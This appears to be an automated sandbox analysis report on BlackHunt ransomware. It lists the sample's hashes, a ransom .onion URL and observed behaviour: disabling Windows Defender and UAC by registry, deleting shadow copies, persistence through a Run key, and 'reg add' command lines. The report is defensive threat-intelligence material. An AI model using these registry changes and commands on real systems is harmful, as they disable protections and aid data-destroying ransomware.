Analysis
-
max time kernel
164s -
max time network
175s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:21
Static task
static1
Behavioral task
behavioral1
Sample
51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe
Resource
win10v2004-20231215-en
General
-
Target
51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe
-
Size
707KB
-
MD5
7b609ce8e6795fcaa69ecceeb2a5c604
-
SHA1
82e532541c2836fc801ef8da447b7a936d83e6aa
-
SHA256
51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791
-
SHA512
c176aaa9fc6c205756ce7859955c0d27b07e666ff1c754dfb1f0742182ccf53acb680b8ea56bf0e8cbfd63f8493a63e1a8f730cfaf32b89b17ce5af2e5a214ef
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F8kvnh:6uaTmkZJ+naie5OTamgEoKxLWwah
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6124 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2224 bcdedit.exe 5964 bcdedit.exe -
Renames multiple (788) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 4056 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\N: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\V: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\M: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\W: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\Y: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\U: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\I: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\Z: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\X: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\R: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\T: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\P: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\Q: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\A: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\G: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\J: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\E: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\B: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\O: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\S: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\K: 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\plugins\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\pkcs11cryptotoken.md 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\jpeg_fx.md 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\US_export_policy.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\sunmscapi.jar 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\dynalink.md 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\ct.sym 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\RestoreInitialize.mp2v 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\he\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_extensions.pak 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\bcel.md 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\profile.jfc 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xerces.md 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\LICENSE 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre-1.8\release 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\snmp.acl.template 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_100_percent.pak 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_ReadMe.hta 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.txt 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_Private.key 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4540 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6116 vssadmin.exe 6016 vssadmin.exe 5940 vssadmin.exe 888 vssadmin.exe 6020 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeRestorePrivilege 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeBackupPrivilege 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeTakeOwnershipPrivilege 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeAuditPrivilege 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeSecurityPrivilege 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeIncBasePriorityPrivilege 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Token: SeBackupPrivilege 5700 vssvc.exe Token: SeRestorePrivilege 5700 vssvc.exe Token: SeAuditPrivilege 5700 vssvc.exe Token: SeBackupPrivilege 5056 wbengine.exe Token: SeRestorePrivilege 5056 wbengine.exe Token: SeSecurityPrivilege 5056 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1432 wrote to memory of 4144 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 89 PID 1432 wrote to memory of 4144 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 89 PID 1432 wrote to memory of 3412 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 91 PID 1432 wrote to memory of 3412 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 91 PID 1432 wrote to memory of 4364 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 93 PID 1432 wrote to memory of 4364 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 93 PID 1432 wrote to memory of 1912 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 95 PID 1432 wrote to memory of 1912 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 95 PID 1432 wrote to memory of 3108 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 97 PID 1432 wrote to memory of 3108 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 97 PID 1432 wrote to memory of 2600 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 99 PID 1432 wrote to memory of 2600 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 99 PID 1432 wrote to memory of 1744 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 101 PID 1432 wrote to memory of 1744 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 101 PID 1432 wrote to memory of 4992 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 102 PID 1432 wrote to memory of 4992 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 102 PID 1432 wrote to memory of 3152 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 105 PID 1432 wrote to memory of 3152 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 105 PID 1432 wrote to memory of 1484 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 108 PID 1432 wrote to memory of 1484 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 108 PID 1432 wrote to memory of 1632 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 107 PID 1432 wrote to memory of 1632 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 107 PID 1432 wrote to memory of 4112 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 109 PID 1432 wrote to memory of 4112 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 109 PID 1432 wrote to memory of 1176 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 113 PID 1432 wrote to memory of 1176 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 113 PID 1432 wrote to memory of 440 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 112 PID 1432 wrote to memory of 440 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 112 PID 1432 wrote to memory of 3128 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 111 PID 1432 wrote to memory of 3128 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 111 PID 1432 wrote to memory of 1108 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 122 PID 1432 wrote to memory of 1108 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 122 PID 1432 wrote to memory of 1288 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 119 PID 1432 wrote to memory of 1288 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 119 PID 1432 wrote to memory of 3508 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 118 PID 1432 wrote to memory of 3508 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 118 PID 1432 wrote to memory of 1020 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 128 PID 1432 wrote to memory of 1020 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 128 PID 1432 wrote to memory of 2144 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 127 PID 1432 wrote to memory of 2144 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 127 PID 1432 wrote to memory of 2276 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 125 PID 1432 wrote to memory of 2276 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 125 PID 1432 wrote to memory of 5104 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 132 PID 1432 wrote to memory of 5104 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 132 PID 1432 wrote to memory of 4884 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 133 PID 1432 wrote to memory of 4884 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 133 PID 1432 wrote to memory of 1156 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 135 PID 1432 wrote to memory of 1156 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 135 PID 1432 wrote to memory of 3316 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 150 PID 1432 wrote to memory of 3316 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 150 PID 1432 wrote to memory of 2556 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 148 PID 1432 wrote to memory of 2556 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 148 PID 1432 wrote to memory of 3824 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 137 PID 1432 wrote to memory of 3824 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 137 PID 1432 wrote to memory of 4028 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 146 PID 1432 wrote to memory of 4028 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 146 PID 1432 wrote to memory of 3136 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 138 PID 1432 wrote to memory of 3136 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 138 PID 1432 wrote to memory of 2028 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 139 PID 1432 wrote to memory of 2028 1432 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe 139 PID 4144 wrote to memory of 1888 4144 cmd.exe 177 PID 4144 wrote to memory of 1888 4144 cmd.exe 177 PID 3412 wrote to memory of 3112 3412 cmd.exe 167 PID 3412 wrote to memory of 3112 3412 cmd.exe 167 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe"C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1432 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:1888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:3112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:4364
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3480
-
